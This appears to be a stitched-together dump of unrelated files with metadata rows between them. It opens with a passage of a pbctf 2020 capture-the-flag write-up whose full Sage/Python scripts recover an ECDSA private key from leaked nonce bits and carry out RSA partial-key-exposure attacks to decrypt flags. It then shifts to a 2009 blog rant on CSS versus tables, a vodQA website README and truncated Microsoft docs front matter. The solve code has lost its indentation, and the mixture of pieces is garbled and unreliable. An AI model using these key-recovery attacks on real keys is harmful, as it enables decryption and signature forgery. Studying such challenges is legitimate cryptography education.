and $$x = \begin{pmatrix}t_{2}&t_{3}&\cdots&t_{u}&d_{11}&d_{12}&d_{21}&\cdots&d_{u1}&d_{u2}&-1\end{pmatrix}$$, $$xA = 0$$<br>
LLL would find us a short vector given a basis and we know unknows($$d_{ij}$$) are small.it's logical to consider a vector with entries $$d_{ij}$$ as a short vector.<br>$$x$$ contains $$d_{ij}$$.so, we can add more columns to $$A$$ with non zero diagonal entries $$(c_{ij})$$<br>
<center>
$$A = \begin{bmatrix}
q&\cdots&0&0 \\
&\ddots& \\
0&\cdots&q&0 \\
\tau_{21}&\cdots&\tau_{u1}&c_{11} \\
\tau_{22}&\cdots&\tau_{u2}& &c_{12} \\
\sigma_{21}&\cdots&0& & &c_{21} \\
\sigma_{22}&\cdots&0& & & &c_{22} \\
&\ddots&0& & & & &\ddots \\
0&\cdots&\sigma_{u1}& & & & & &c_{u1} \\
0&\cdots&\sigma_{u2}& & & & & & &c_{u1} \\
\gamma_{2}&\cdots&\gamma_{u}
\end{bmatrix}$$
</center>
<br>
$$xA = (0,\ \cdots,\ 0,\ c_{11}d_{11},\ c_{12}d_{12},\ \cdots,\ c_{u1}d_{u1},\ c_{u2}d_{u2})$$ is definitely a short vector.<br>
Now, consider the following basis $$B$$ obtained by applying few changes to matrix $$A$$.(I will explain the reasons behind this changes later in the post)
<center>
$$B = \begin{bmatrix}
2^{m}q&\cdots&0&0 \\
&\ddots& \\
0&\cdots&2^{m}q&0 \\
2^{m}\tau_{21}&\cdots&2^{m}\tau_{u1}&2^{m-\mu_{11}}\\
2^{m}\tau_{22}&\cdots&2^{m}\tau_{u2}& &2^{m-\mu_{12}} \\
2^{m}\sigma_{21}&\cdots&0& & &2^{m-\mu_{21}} \\
2^{m}\sigma_{22}&\cdots&0& & & &2^{m-\mu_{22}} \\
&\ddots&0& & & & &\ddots \\
0&\cdots&2^{m}\sigma_{u1}& & & & & &2^{m-\mu_{u1}} \\
0&\cdots&2^{m}\sigma_{u2}& & & & & & &2^{m-\mu_{u2}} \\
2^{m}\gamma_{2}&\cdots&2^{m}\gamma_{u}&2^{m-1}&2^{m-1}&\cdots& & & &2^{m-1}&2^{m-1}
\end{bmatrix}$$
</center>
let $$v = \begin{pmatrix}t_{2}&t_{3}&\cdots&t_{u}&d_{11}&d_{12}&d_{21}&\cdots&d_{u1}&d_{u2}&-1\end{pmatrix}$$
$$w = vB = (0,\ \cdots,\ 0,\ d_{11}2^{m-\mu_{11}} - 2^{m-1},\ d_{12}2^{m-\mu_{12}} - 2^{m-1},\ \cdots,\ d_{u1}2^{m-\mu_{u1}} - 2^{m-1},\ d_{u2}2^{m-\mu_{u2}} - 2^{m-1}, -2^{m-1})$$
as $$w = vB$$, $$w \in \mathcal{L}$$ and $$\forall\ y\ \in w\ \ \lvert y \rvert \leq 2^{m-1}$$. so, $$w$$ is a short vector and LLL will find it.
Final solution for this challenge is:
- calculate $$\tau_{ij}, \sigma_{ij}, \gamma_{ij}$$ from the signatures
- construct basis $$B$$ and apply reduction algorithm(LLL) on it
- find our target vector in the reduced basis and extract a $$d_{i1},\ d_{i2}$$ pair
- calculate secret key using extracted values and decrypt the flag.easy peasy :wink:
{% raw %}
FLAG :: pbctf{!!!\_https://eprint.iacr.org/2019/023.pdf\_$$$}
{% endraw %}
Reasons(I believe) for why we did few things the way we did
- we have calculated $$r_{1}E_{i} - r_{i}E_{1}$$, instead of directly using $$E_{i}$$ to reduce the Lattice dimension for faster basis reduction
- we have added an extra column at the end to the matrix $$A$$ cause $$A$$ is not really a basis because of redundancies as $$A$$ has $$n+1$$ vectors of degree $$n$$. And entry of that column could be used to identify the target vector in the reduced basis.
- we used $$c_{ij} = 2^{m-\mu_{ij}}$$. $$\ \ c_{ij}$$ could be any nonzero value.remember that $$\mu_{ij}$$ is the bitlength of $$d_{ij}$$ and $$m = \max_{ij}\mu_{ij}$$. In our target short vector we have terms $$c_{ij}d_{ij}$$. with
$$c_{ij} = 2^{m-\mu_{ij}}$$, $$c_{ij}d_{ij} = 2^{m-\mu_{ij}}d_{ij}$$ and $$d_{ij}$$ are of bitlength $$\mu_{ij}$$, therefore $$2^{m-\mu_{ij}}d_{ij} \approx 2^{m}$$ as a result all the terms in our target vector will have same size.
- we changed entries of the last row to $$2^{m-1}$$ when they could have been $$0$$.the reason for this is, our target vector is linear combinations of row vectors of B and for our target vector, linear combination of all rows except the last will have entries of size $$2^{m}$$ and last row vector is subtracted from that to obtain the target vector. if last row entries are $$0$$ then target vector entries would be $$0 < w_{i} < 2^{m}$$, if they are $$2^{m-1}$$ then $$-2^{m-1} < w_{i} < 2^{m-1}$$ and this helps us cause LLL reduction algorithm uses Euclidean norm to decide size of the vectors and Euclidean norm doesn't change based on the sign(uses squares of them). so, our target vector is much shorter with respect to LLL.
- Above, I said that $$c_{ij} = 2^{m-\mu_{ij}}$$ to make entries of the target vector to have same size but why $$2^{m}$$? why not let's say $$\delta$$ less than $$2^{m}$$.suppose we want to use $$\delta$$ instead of $$2^{m}$$ then we could set $$c_{ij} = \delta/\mu_{ij}$$ and last row entries to $$\delta/2$$ to achieve the same i.e entries of our target vector will be of same size and range is also converted to $$-\delta/2 < w_{i} < \delta/2$$. but now few of the entries will be Rational numbers. so, the lattice is now on Rational numbers and to avoid that i.e in order to ensure that all the entries are integer values. $$\delta$$ is set to $$1$$ and entire basis $$B$$ is scaled with $$2^{m}$$
Oof, This is the longest writeup I've written.if you find any mistake or didn't understand anything, feel free to DM me [@S3v3ru5\_](https://twitter.com/S3v3ru5_)
if you want to learn more about this type of challenges. keywords "Hidden Number problem", "Extended Hidden Number problem", "Biased nonce", "leaked nonce" should help you while searching.
```python
{% raw %}
def parse_output():
import ast
with open("output") as f:
data = f.read().strip()
return ast.literal_eval(data)
def gen_tau_sigma(sigs, modulus):
K = 2**40
li = 2
u = 30
h1, leak1, r1, s1 = sigs[0]
vals = []
# (τ1,i)*d11 + (τ2,i)*d12 + (σi,1)*di1 + (σi,1)*di2 - γi = 0 mod q
for i in range(1, len(sigs)):
hi, leaki, ri, si = sigs[i]
# γi = r1(siki − H(mi)) − ri(s1k1 − H(m1)) mod q
gamma_i = r1*(si*leaki*K - hi) - ri*(s1*leak1*K - h1)
gamma_i = gamma_i % modulus
# τ1,i = r1si
# τ2,i = s1ri(2^(256 - 40))
taus = []
taus.append((ri*s1) % modulus)
taus.append((ri*s1*(2**(256 - 40))) % modulus)
# σi,1 = -r1*si
# σi,2 = -r1*si*(2^(256 - 40))
sigmas = []
sigmas.append((-r1*si) % modulus)
sigmas.append((-r1*si*(2**(256 - 40))) % modulus)
vals.append((taus, sigmas, gamma_i))
return vals
def construct_B(vals, modulus):
u = 30
li = 2
mu_ij = 40
m_ = 40
q = modulus
T = 60
pow_2_m = 2**m_
inc_factor = 1 # Δ
B = matrix.zero(ZZ, T + u)
# fill diagonal
tmp = (2**m_) * q
for i in range(u - 1):
B[i, i] = tmp * inc_factor
for i in range(u - 1, B.nrows() - 1):
B[i, i] = 1
B[-1, -1] = 2**(m_ - 1)
# fill taus (τ)
row_ind = u - 1
for tau_ind in range(u - 1):
tau = vals[tau_ind][0]
for i in range(li):
B[row_ind + i, tau_ind] = tau[i] * pow_2_m * inc_factor
# fill sigmas (σ)
row_ind = row_ind + li
for col_ind in range(u - 1):
sigma = vals[col_ind][1]
for i in range(li):
B[row_ind + i, col_ind] = sigma[i] * pow_2_m * inc_factor
row_ind += li
assert (row_ind == B.nrows() - 1), f"{row_ind}, {B.nrows()}"
# fill gamma vals (γ)
for col_ind in range(u-1):
B[row_ind, col_ind] = vals[col_ind][2] * pow_2_m * inc_factor
tmp = 2**(m_ - 1)
for col_ind in range(u - 1, B.ncols()):
B[row_ind, col_ind] = tmp
return B
def check_dis(vals, dis, modulus):
# check given dis are correct or not
# by checking if they are zeros to the
# generated equations
# i.e (τ1,i)*d11 + (τ2,i)*d12 + (σi,1)*di1 + (σi,1)*di2 - γi = 0 mod q
u = 30
d11 = dis[0][0]
d12 = dis[0][1]
checks = []
for i in range(u - 1):
taus, sigmas, gamma_i = vals[i]
di1, di2 = dis[i + 1]
res = taus[0]*d11 + taus[1] * d12
res = res + sigmas[0]*di1 + sigmas[1]*di2
res = res - gamma_i
checks.append((res % modulus) == 0)
return checks
def calc_priv(sigs, dis, modulus):
# calculate private keys using dis
# ki = di1 + leak*2^40 + di2*2^(256-40)
# si*ki = hi + ri*private_key
# private_key = (siki - hi)/ri
privs = []
u = 30
for i in range(u):
di1, di2 = dis[i]
hi, leaki, ri, si = sigs[i]
ki = di1 + leaki*(2**40) + di2*(2**(256 - 40))
alpha = (ki*si - hi) % modulus
alpha = alpha * inverse_mod(ri, modulus)
alpha = alpha % modulus
privs.append(alpha)
assert len(set(privs)) == 1
return privs[0]
def decrypt(secret):
import hashlib
from Crypto.Cipher import AES
sha256 = hashlib.sha256()
sha256.update(str(secret).encode())
key = sha256.digest()
aes = AES.new(key, mode=AES.MODE_ECB)
ct = bytes.fromhex("8d47217b47714708b39befc5bef252e621d3c10fdb1d8d6168c62c4f7b981c185b44a907c9db378b1bfd3b984262ad157ead801493286eb877e7c774978c3f4d")
return aes.decrypt(ct)
sigs = parse_output()
u = 30
li = 2
mu_ij = 40
m_ = 40
q = 115792089237316195423570985008687907852837564279074904382605163141518161494337
T = 60
modulus = q
vals = gen_tau_sigma(sigs, q)
B = construct_B(vals, q)
M = B.LLL()
ww = M[0]
vv = B.solve_left(ww)
if vv[-1] == 1:
vv = vv*-1
dis = list(map(Integer, vv[u - 1: -1]))
dis = [(dis[i], dis[i+1]) for i in range(0, len(dis), 2)]
assert all(check_dis(vals, dis, modulus)), "Busted"
secret_key = calc_priv(sigs, dis, modulus)
flag = decrypt(secret_key)
print("flag =", flag[:-flag[-1]].decode())
"""
flag = pbctf{!!!_https://eprint.iacr.org/2019/023.pdf_$$$}
References:
[1] Gabrielle De Micheli, Rémi Piau, Cécile Pierrot A Tale of Three Signatures: Practical Attack of ECDSA with wNAF
https://link.springer.com/chapter/10.1007/978-3-030-51938-4_18
"""
{% endraw %}
```
---
# <a name="specialgift"></a> Special gift and it's revenge
challenge.py
```python
#!/usr/bin/env python3
from Crypto.Util.number import getStrongPrime, inverse, bytes_to_long, GCD as gcd
from Crypto.Random.random import randint
from flag import flag
p = getStrongPrime(512)
q = getStrongPrime(512)
N = p * q
phi = (p - 1) * (q - 1)
# Hehe, boi
while True:
d = randint(int(N ** 0.399), int(N ** 0.4))
if gcd(d, phi) == 1:
break
e = inverse(d, phi)
# Here's a special gift. Big.
gift = d >> 120
enc = pow(bytes_to_long(flag), e, N)
print("N =", N)
print("e =", e)
print("gift =", gift)
print("enc =", enc)
```
RSA key is generated and msb bits of the private exponent($$d$$) are given along with the public key$$(N, e)$$.<br>
for Special Gift challenge $$d \approx N^{0.4}$$ and for Special Gift revenge $$d \approx N^{0.6}$$.<br>
I have implemented algorithms given in paper "Partial Key Exposure Attacks on RSA up to Full Size Exponents"[(link)](https://link.springer.com/chapter/10.1007/11426639_22).
Algorithm described in section 4.1.1 works for the Special Gift challenge and Algorithm described in section 4.1.2 works for the Special Gift Revenge challenge.
There are few things I don't understand completely in these algorithm so I'm not gonna try to explain this algorithm as I did for LeaK.<br>
solve.sage
```python
{% raw %}
def find_z0(pol, f1, f2):
"""
find root z0
given (x0, y0, z0) is roots of pol, f1, f2
and f1, f2 are not multiples of pol
on the assumption that
resultant computations of polynomials yield non-zero polynomials
"""
x, y, z = pol.parent().gens()
PZ = PolynomialRing(IntegerRing(), "zn")
zn = PZ.gen()
r1 = f1.resultant(pol, x)
r2 = f2.resultant(pol, x)
r3 = r1.resultant(r2, y)
check = r3 - r3.constant_coefficient()
if check == 0:
return False, None
final_pol = r3.subs(z = zn)
if type(final_pol) == type(Integer()):
return False, None
z_roots = list(map(lambda t: t[0], final_pol.roots()))
if len(z_roots) == 0:
return False, None
if len(z_roots) == 1 and z_roots[0] == 0:
return False, None
return True, z_roots
def root_z0(HH, pol):
"""
from the reduced polynomials find f1, f2 such that
f1(x0, y0, z0) = f2(x0, y0, z0) == 0,
f1 % pol != 0, f2 % pol != 0
and find root z0
"""
D = {}
for i in HH:
if HH[i] % pol != 0:
D[i] = HH[i]
if len(D.keys()) == 0:
print("All are multpliers of pol")
return []
res = []
poss = list(D.keys())
if 0 in poss:
poss.remove(0)
for i, j in Combinations(poss, 2):
found, root = find_z0(pol, D[i], D[j])
if found:
# res.extend(root)
return root[0]
# return list(set(res))
def get_monomials(pols):
# return all unique monomials part of polynomials in pols
x, y, z = pols[0].parent().gens()
monomials_tmp = []
monomials = []
deg_x = deg_y = deg_z = 0
for t_poly in pols:
monomials_tmp += t_poly.monomials()
deg_x = max(deg_x, t_poly.degree(x))
deg_y = max(deg_y, t_poly.degree(y))
deg_z = max(deg_z, t_poly.degree(z))
monomials_tmp = sorted(set(monomials_tmp))
monomials = []
for k in range(deg_z + 1):
for j in range(deg_y + 1):
for i in range(deg_x + 1):
mono = x^i * y^j * z^k
if mono in monomials_tmp:
monomials += [x^i * y^j * z^k]
return monomials
def ernst_trivariate(pol, XU, YU, ZU, WW, mm, tt):
"""
Finds small roots to the trivariate equations of form
f(x, y, z) = a0 + a1*x + a2*y + a3*y*z
tt = τ*mm
x0 < X, y0 < Y, z0 < Z and
X^(1+3τ) * Y^(2+3τ) * Z(1+3τ+3τ^2) ≤ W^(1+3τ)
References:
[1] Matthias Ernst, Ellen Jochemsz, Alexander May, Benne de Weger. "Partial Key Exposure Attacks on RSA up to Full Size Exponents"
https://link.springer.com/chapter/10.1007/11426639_22
"""
PR = pol.parent()
x, y, z = PR.gens()
RR = (XU * YU)^mm * ZU^(mm + tt) * WW
# make constant term 1 modulo RR
# res-> f_ = 1 + a*x + b*y + c*y*z
f_ = pol
a0 = f_.constant_coefficient()
if a0 != 0:
assert gcd(a0, RR) == 1, "gcd(a0, RR) != 1"
F = Zmod(RR)
PK = PolynomialRing(F, 'xs, ys, zs')
PR = pol.parent()
f_ = PR(PK(f_) * F(a0)^-1)
# construct shift polynomials (cf.[1] p.7)
g_shft_pols = set()
for i in range(mm + 1):
for j in range(mm - i + 1):
for k in range(j + 1):
tmp_pol = x^i * y^j * z^k
tmp_pol *= f_
tmp_pol *= XU^(mm - i) * YU^(mm - j) * ZU^(mm + tt - k)
g_shft_pols.add(tmp_pol)
h_shift_pols = set()
for i in range(mm + 1):
for j in range(mm - i + 1):
for k in range(j + 1, j + tt + 1):
tmp_pol = x^i * y^j * z^k
tmp_pol *= f_
tmp_pol *= XU^(mm - i) * YU^(mm - j) * ZU^(mm + tt - k)
h_shift_pols.add(tmp_pol)
g_dash_pols = set()
for i in range(mm + 1 + 1):
j = mm + 1 - i
for k in range(j + 1):
g_dash_pols.add(RR * x^i * y^j * z^k)
h_dash_pols = set()
for i in range(mm + 1 + 1):
j = mm + 1 - i
for k in range(j + 1, j + tt + 1):
h_dash_pols.add(RR * x^i * y^j * z^k)
# calculate all monomials
G = list(g_shft_pols) + list(h_shift_pols) + list(g_dash_pols) + list(h_dash_pols)
monomials = get_monomials(G)
monomials_2 = get_monomials(list(g_dash_pols) + list(h_dash_pols))
# order monomials such that g_shift_pols and h_shift_pols
# will be the top rows of the basis
final_monomials = []
for mono in monomials:
if mono not in monomials_2:
final_monomials += [mono]
final_monomials = final_monomials + monomials_2
monomials = final_monomials
assert len(monomials) == len(G)
dims = len(monomials)
# calculate coefficient vectors gijk(xX, yY, zZ) and ...
coefficient_vecs = []
for i in range(dims):
tmp_pol = G[i]
pol_coeffs = []
for monomial in monomials:
pol_coeffs.append(
tmp_pol.monomial_coefficient(monomial) * monomial(XU, YU, ZU)
)
coefficient_vecs.append(pol_coeffs)
# order coefficient vectors such that
# diagonal entries of g and h are equal to
# (X*Y)^m * Z^(m + t)
ordered_vecs = [0 for _ in range(dims)]
for i in range(len(coefficient_vecs)):
j = 0
while coefficient_vecs[i][j] == 0:
j += 1
ordered_vecs[j] = coefficient_vecs[i]
M = Matrix(IntegerRing(), ordered_vecs)
B = M.LLL()
# construct polynomials using reduced basis
H = [(i, 0) for i in range(dims)]
H = dict(H)
for i in range(dims):
for j in range(dims):
assert B[i, j] % monomials[j](XU, YU, ZU) == 0
H[i] += PR((monomials[j] * B[i, j]) / monomials[j](XU, YU, ZU))
return H
def ernst_trivariate_2nd_case(pol, XU, YU, ZU, WW, mm, tt):
"""
Finds small roots to the trivariate equations of form
f(x, y, z) = a0 + a1*x + a2*y + a3*y*z + a4*d*z
tt = τ*mm
x0 < X, y0 < Y, z0 < Z and
X^(2+3τ) * Y^(3+6τ+6τ^2) * Z(3+3τ) ≤ W^(2+3τ)
References:
[1] Matthias Ernst, Ellen Jochemsz, Alexander May, Benne de Weger. "Partial Key Exposure Attacks on RSA up to Full Size Exponents"
https://link.springer.com/chapter/10.1007/11426639_22
"""
PR = pol.parent()
x, y, z = PR.gens()
RR = XU^mm * YU^(mm + tt) * ZU^mm * WW
# make constant term 1 modulo RR
# res-> f_ = 1 + a*x + b*y + c*y*z + d*z
f_ = pol
a0 = f_.constant_coefficient()
if a0 != 0:
assert gcd(a0, RR) == 1, "gcd(a0, RR) != 1"
F = Zmod(RR)
PK = PolynomialRing(F, 'xs, ys, zs')
PR = pol.parent()
f_ = PR(PK(f_) * F(a0)^-1)
# construct shift polynomials (cf.[1] p.9)
g_shft_pols = set()
for i in range(mm + 1):
for j in range(mm - i + 1):
for k in range(mm - i + 1):
tmp_pol = x^i * y^j * z^k
tmp_pol *= f_
tmp_pol *= XU^(mm - i) * YU^(mm + tt - j) * ZU^(mm - k)
g_shft_pols.add(tmp_pol)
h_shift_pols = set()
for i in range(mm + 1):
for j in range(mm - i + 1, mm - i + tt + 1):
for k in range(mm - i + 1):
tmp_pol = x^i * y^j * z^k
tmp_pol *= f_
tmp_pol *= XU^(mm - i) * YU^(mm + tt - j) * ZU^(mm - k)
h_shift_pols.add(tmp_pol)
g_dash_pols = set()
for i in range(mm + 1 + 1):
for j in range(mm + tt + 1 - i + 1):
k = mm + 1 - i
g_dash_pols.add(RR * x^i * y^j * z^k)
h_dash_pols = set()
for i in range(mm + 1):
j = mm + tt + 1 - i
for k in range(mm - i + 1):
h_dash_pols.add(RR * x^i * y^j * z^k)
# diagonal_entry = XU^mm * YU^(mm + tt) * ZU^mm
# calculate all monomials
G = list(g_shft_pols) + list(h_shift_pols) + list(g_dash_pols) + list(h_dash_pols)
monomials = get_monomials(G)
monomials_2 = get_monomials(list(g_dash_pols) + list(h_dash_pols))
# order monomials such that g_shift_pols and h_shift_pols
# will be the top rows of the basis
final_monomials = []
for mono in monomials:
if mono not in monomials_2:
final_monomials += [mono]
final_monomials = final_monomials + monomials_2
monomials = final_monomials
assert len(monomials) == len(G)
dims = len(monomials)
# calculate coefficient vectors gijk(xX, yY, zZ) and ...
coefficient_vecs = []
for i in range(dims):
tmp_pol = G[i]
pol_coeffs = []
for monomial in monomials:
pol_coeffs.append(
tmp_pol.monomial_coefficient(monomial) * monomial(XU, YU, ZU)
)
coefficient_vecs.append(pol_coeffs)
# order coefficient vectors such that
# diagonal entries of g and h are equal to
# X^m * Y^(m+t) * Z^m
ordered_vecs = [0 for _ in range(dims)]
for i in range(len(coefficient_vecs)):
j = 0
while coefficient_vecs[i][j] == 0:
j += 1
ordered_vecs[j] = coefficient_vecs[i]
M = Matrix(IntegerRing(), ordered_vecs)
B = M.LLL()
# construct polynomials using reduced basis
H = [(i, 0) for i in range(dims)]
H = dict(H)
for i in range(dims):
for j in range(dims):
assert B[i, j] % monomials[j](XU, YU, ZU) == 0
H[i] += PR((monomials[j] * B[i, j]) / monomials[j](XU, YU, ZU))
return H
if 1:
# pbctf 2020 Crypto Special gift
print("pbctf 2020 Crypto Special gift\n")
N = 124588792854585991543122421017579759242707321792822503200983206042530513248160179498235727796077646122690756838184806567078369714502863053151565317001149999657802192888347495811627518984421857644550440227092744651891241056244522365071057538408743656419815042273198915328775318113249292516318084091006804073157
e = 109882604549059925698337132134274221192629463500162142191698591870337535769029028534472608748886487359428031919436640522967282998054300836913823872240009473529848093066417214204419524969532809574214972094458725753812433268395365056339836734440559680393774144424319015013231971239186514285386946953708656025167
gift = 870326170979229749948990285479428244545993216619118847039141213397137332130507928675398
R = (e*gift*(2**120)) - 1
delta = 120/1024
beta = 0.4
tau = (1/2) - delta
mm = 2
tt = 1
XU = floor(N**delta)
YU = floor(N**beta)
ZU = floor(3*(N**(1/2)))
while gcd(R, XU) != 1:
XU += 1
while gcd(R, YU) != 1:
YU += 1
while gcd(R, ZU) != 1:
ZU += 1
WW = max((e*XU, N*YU, YU*ZU, R))
RR = (XU * YU)^mm * ZU^(mm + tt) * WW
cond = int(XU^(1+3*tau) * YU^(2+3*tau) * ZU^(1 + 3*tau + 3*tau^2)) < int(WW^(1 + 3*tau))
print("W >= NY", WW >= N*YU)
print("Good =", cond)
PR = PolynomialRing(IntegerRing(), "x, y, z")
x, y, z = PR.gens()
# (x0, y0, z0) = (d0, k, p + q - 1)
pol = e*x - N*y + y*z + R
a0 = pol.constant_coefficient()
assert gcd(a0, RR) == 1, "gcd(a0, RR) != 1"
HH = ernst_trivariate(pol, XU, YU, ZU, WW, mm=mm, tt = tt)
z0 = root_z0(HH, pol)
phi_N = N - z0
d = inverse_mod(e, phi_N)
enc = 67594553703442235599059635874603827578172490479401786646993398183588852399713973330711427103837471337354320292107030571309136139408387709045820388737058807570181494946004078391176620443144203444539824749021559446977491340748598503240780118417968040337516983519810680009697701876451548797213677765172108334420
m = int(pow(enc, d, N))
from Crypto.Util.number import long_to_bytes
flag = long_to_bytes(m)
print("\nSpecial Gift = ", flag.decode(), end="\n\n")
if 1:
# pbctf 2020 Crypto Special gift revenge
print("pbctf 2020 Crypto Special gift revenge\n")
N = 123463519828344660835965296108959625188149729700517379543746606603601816029557213728343115758280318474617032830851553509268562367217512005079977122560679743955588214135519642513042848616372204042776892196887455692479457740367547908255044784496969010537283159300508751036032559594474145098337531029291955103059
e = 85803665824396212221464259773478155183477895540333642019501498374139506738444521180470104195883386495607712971252463223185914391456070458788554837326327618859712794129800329295751565279950274474800740076285111503780662397876663144946831503522281710586712396810593754749589799811545251575782431569881989690861
gift = 46710143823773072238724337855139753113453277386728402328859555407710009799097841900723288768522450009531777773692804519189753306306645410280934372812
d_ = gift * (2**120)
k_ = (e*d_ - 1) // N
R = e*d_ - 1 - k_ * N
beta = 0.6
delta = 120 / 1024
gamma = max(delta, beta - 1/2)
tau = ((1/2) - delta - gamma)/(2*gamma)
mm = 2
tt = 1
XU = floor(N^delta)
YU = floor(4*N^gamma)
ZU = floor(3*N^(1/2))
while gcd(R, XU) != 1:
XU += 1
while gcd(R, YU) != 1:
YU += 1
while gcd(R, ZU) != 1:
ZU += 1
WW = max((e*XU, N*YU, YU*ZU, k_*ZU, R))
RR = XU^mm * YU^(mm + tt) * ZU^mm * WW
cond_lhs = XU^(2 + 3*tau) * YU^(3 + 6*tau + 3*tau^2) * ZU^(3 + 3*tau)
cond_rhs = WW^(2+3*tau)
print("W >= NY", WW >= N*YU)
print("Good =", int(cond_lhs) < int(cond_rhs))
PR = PolynomialRing(IntegerRing(), 'x, y, z')
x, y, z = PR.gens()
# (x0, y0, z0) = (d0, k0, p + q - 1)
pol = e*x - N*y + y*z + k_ * z + R
a0 = pol.constant_coefficient()
assert gcd(a0, RR) == 1, "Error: gcd(a0, RR) != 1"
HH = ernst_trivariate_2nd_case(pol, XU, YU, ZU, WW, mm, tt)
z0 = root_z0(HH, pol)
phi_N = N - z0
d = inverse_mod(e, phi_N)
enc = 106121451638162677594573310940827829041097305506084523508481527070289767121202640647932427882853090304492662258820333412210185673459181060321182621778215705296467924514370932937109363645133019461501960295399876223216991409548390823510949085131028770701612550221001043472702499511394058569487248345808385915190
m = int(pow(enc, d, N))
from Crypto.Util.number import long_to_bytes
flag = long_to_bytes(m)
print("\nSpecial Gift Revenge = ", flag.decode(), end="\n\n")
"""
pbctf 2020 Crypto Special gift
W >= NY True
Good = True
Special Gift = pbctf{I_used_http://souravsengupta.com/publications/2010_indocrypt_2.pdf.How_about_you?}
pbctf 2020 Crypto Special gift revenge
W >= NY True
Good = True
Special Gift Revenge = pbctf{thank_you_rkm0959,_for_finding_unintended_solution}
"""
# References for implementation
"""
[1] https://github.com/elliptic-shiho/crypto_misc/blob/master/small_root/jochemsz_may.sage
[2] https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage
"""
{% endraw %}
```
| 32.837662 | 732 | 0.650806 | eng_Latn | 0.753261 |
97471ddfa9a7614a5f4c6c54638a5c7cbbaa21ba | 2,080 | md | Markdown | jekyll/_posts/blog/2009/2009-02-15-tumblr-78458169.md | BenWard/benward | f32687f015b2884ecda417db17945b0053a52753 | [
"RSA-MD"
] | 4 | 2015-01-19T21:49:43.000Z | 2020-07-26T06:13:17.000Z | jekyll/_posts/blog/2009/2009-02-15-tumblr-78458169.md | BenWard/benward | f32687f015b2884ecda417db17945b0053a52753 | [
"RSA-MD"
] | null | null | null | jekyll/_posts/blog/2009/2009-02-15-tumblr-78458169.md | BenWard/benward | f32687f015b2884ecda417db17945b0053a52753 | [
"RSA-MD"
] | 6 | 2016-01-25T13:52:27.000Z | 2020-08-18T20:03:31.000Z | ---
layout: blog
category: blog
date: "2009-02-15T09:10:19+0000"
tags:
- "web development"
- "rants"
- "tables"
- "css"
- "twitter"
original_service: tumblr
original_url: "http://blog.benward.me/post/78458169/the-reason-youre-giving-up-and-using-tables-is"
tumblr_post_type: photo
atomid: "http://blog.benward.me/post/78458169/the-reason-youre-giving-up-and-using-tables-is"
---
<figure class="photo">
<a href="http://twitter.com/feather/status/1203969522"><img src="http://benward.me/res/tumblr/media/78458169/0.jpg" alt="Image"></a>
</figure>
> The reason you're giving up and using tables is not because it is easier. It is because you don't know CSS. Hmph.
<cite>[Derek Featherstone](http://twitter.com/feather/status/1203969522)</cite>
_There is no ‘CSS vs. Tables’ debate_. What's going on is this: CSS evangelism happened. It went as far as it could in that form. It educated an entire generation of developers. It helped the profession of web development become truly _professional_. It opened peoples eyes to the power of a the web beyond visuals and propelled them to value accessibility, interoperability, semantics, microformats and much more that makes the web rich.
That CSS evangelism ceased. It's ceased because everyone who's going to get it, has got it; learned it; knows it. Other audiences need different kinds of education. That leaves a vacuum. A vacuum free of that passion, expertise and talent that drove initial CSS adoption. _On the internet, vacuums get filled with noise_. Noise from the cynics, also-rans and can't-be-arseds of the web. People like 37signals, with a habit of ignoring well qualified advice in favour of link-bait posturing. People who are simply missing the skills they need to do this job, but who spy an opportunity to rebel against education, rather than seek out new knowledge. They preach that the world is flat, because they haven't yet travelled around it.
There is no resurgence in ‘table based design’. All we're hearing are the unsupressed wails of those those left behind, because everybody else moved on. | 74.285714 | 730 | 0.770673 | eng_Latn | 0.994865 |
97476345f624c6b8f21455082cc1be299ac0447c | 1,840 | md | Markdown | Readme.md | ThoughtWorks-Bangalore/vodqa-shots | 9d366d37f204a11e5f155b4948ba12e2709fcaf2 | [
"MIT"
] | null | null | null | Readme.md | ThoughtWorks-Bangalore/vodqa-shots | 9d366d37f204a11e5f155b4948ba12e2709fcaf2 | [
"MIT"
] | null | null | null | Readme.md | ThoughtWorks-Bangalore/vodqa-shots | 9d366d37f204a11e5f155b4948ba12e2709fcaf2 | [
"MIT"
] | 1 | 2016-05-17T13:37:48.000Z | 2016-05-17T13:37:48.000Z | # vodQA Bangalore
Platform for testing professionals and enthusiasts to share and learn new ideas and practices in the field of testing.
# Development
Using [nanoc](//nanoc.ws) for static site generation. Jekyll/Octopress are hard-coded for blogging, while Nanoc is much simpler, doesn't take any assumptions and allows to build whatever type of content (not just blogs).
To start developing,
* Clone this repository
* Forget about whatever present in the root folder
* Worry only about the `generator` folder
* `cd generator` and do `bundle install`. You'll need RVM + Ruby 2.0
* Make changes (see below folder structure). Mostly you'll be dealing with `generator/content`
* Run `nanoc` to compile the website
* Run `nanoc view` to start a server and browse to `localhost:3000`
For ease, there is a Guardfile. You can run `bundle exec guard`, it will keep watching for changes and re-compile the site whenever any file is changed.
# Folders of interest
* `generator` - this is the main source code, rest are all generated source code that can be ignored
* `generator/assets` - contains all assets
* `generator/assets/app.sass` - contains the main stylesheet
* `generator/assets/img/speakers` - contains speaker images
* `generator/content` - content for each geek night
* `generator/layouts` - layouts for default and archive versions
* `generator/Rules` - routing rules
# Front-End Development
* Pure HTML/CSS/Javascript website. No JQuery.
* Used [HTML5 Boilerplate](//html5boilerplate.com) to generate the skeleton.
* Used [colourlovers.com](//colourlovers.com) for the color swatches.
* Using [SASS](//sass-lang.com) and [Foundation](//foundation.zurb.com) for all the Styling.
* Icon fonts were generated and downloaded from [Fontello](//fontello.com). Only icons from the *Modern Pictogram* set were used for consistency.
| 48.421053 | 220 | 0.765217 | eng_Latn | 0.987729 |
97476680d9ca05e43fcdf19f1c5612aacef8c97c | 1,582 | md | Markdown | docs/integration-services/data-flow/recordset-destination-custom-properties.md | antoniosql/sql-docs.es-es | 0340bd0278b0cf5de794836cd29d53b46452d189 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/data-flow/recordset-destination-custom-properties.md | antoniosql/sql-docs.es-es | 0340bd0278b0cf5de794836cd29d53b46452d189 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/data-flow/recordset-destination-custom-properties.md | antoniosql/sql-docs.es-es | 0340bd0278b0cf5de794836cd29d53b46452d189 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Propiedades personalizadas del destino de conjunto de registros | Microsoft Docs
ms.custom: ''
ms.date: 03/01/2017
ms.prod: sql
ms.prod_service: integration-services
ms.reviewer: ''
ms.technology: integration-services
